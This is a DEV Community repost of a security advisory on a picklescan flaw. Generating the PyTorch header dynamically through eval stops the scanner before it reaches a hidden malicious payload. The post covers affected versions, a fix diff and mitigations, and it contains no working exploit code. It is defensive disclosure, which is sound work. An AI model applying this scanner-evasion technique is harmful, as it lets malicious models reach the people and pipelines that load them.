DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

GHSA-97F8-7CMV-76J2: The Magician's Trick: Bypassing Picklescan with Dynamic Eval

#security #cve #cybersecurity #ghsa

The Magician's Trick: Bypassing Picklescan with Dynamic Eval

Vulnerability ID: GHSA-97F8-7CMV-76J2
CVSS Score: 7.5
Published: 2026-02-18

A logic flaw in the Picklescan security tool allows attackers to bypass malware detection in PyTorch models. By dynamically generating the file header (magic number) using pickle opcodes, an attacker can cause the scanner to abort analysis early, effectively hiding malicious payloads located later in the file stream.

TL;DR

Picklescan, a tool for detecting malicious AI models, can be blinded by a simple trick. If the PyTorch 'magic number' header is generated dynamically (e.g., via eval), Picklescan crashes its check and stops scanning. Meanwhile, PyTorch successfully loads the header and executes the hidden malware waiting behind it.

⚠️ Exploit Status: POC

Technical Details

  • Attack Vector: Local / File-based
  • Impact: Remote Code Execution (RCE)
  • CWE: CWE-693: Protection Mechanism Failure
  • CVSS: 7.5 (High)
  • Component: picklescan.scanner.scan_pytorch
  • Detection: Bypassed via dynamic header generation

Affected Systems

  • picklescan <= 1.0.2
  • Systems ingesting untrusted PyTorch models
  • MLOps pipelines relying on picklescan for validation
  • picklescan: <= 1.0.2 (Fixed in: 1.0.3)

Code Analysis

Commit: b999763

Fix PyTorch magic number bypass by scanning header for globals

@@ -120,7 +120,13 @@
     magic = get_magic_number(data)
     if magic != MAGIC_NUMBER:
-        raise InvalidMagicError(magic, MAGIC_NUMBER, file_id)
+        # Check for dynamic magic number generation...
Enter fullscreen mode Exit fullscreen mode

Mitigation Strategies

  • Update picklescan to version 1.0.3 immediately.
  • Switch model storage formats from Pickle (.pt, .pkl) to Safetensors (.safetensors).
  • Implement sandboxing (e.g., Docker, gVisor) when loading untrusted models, regardless of scan results.

Remediation Steps:

  1. Run pip install --upgrade picklescan.
  2. Rescan any PyTorch models ingested during the vulnerable window (pre-February 2026).
  3. Configure CI/CD pipelines to fail closed if the scanner errors out, rather than ignoring the error.

References

Read the full report for GHSA-97F8-7CMV-76J2 on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)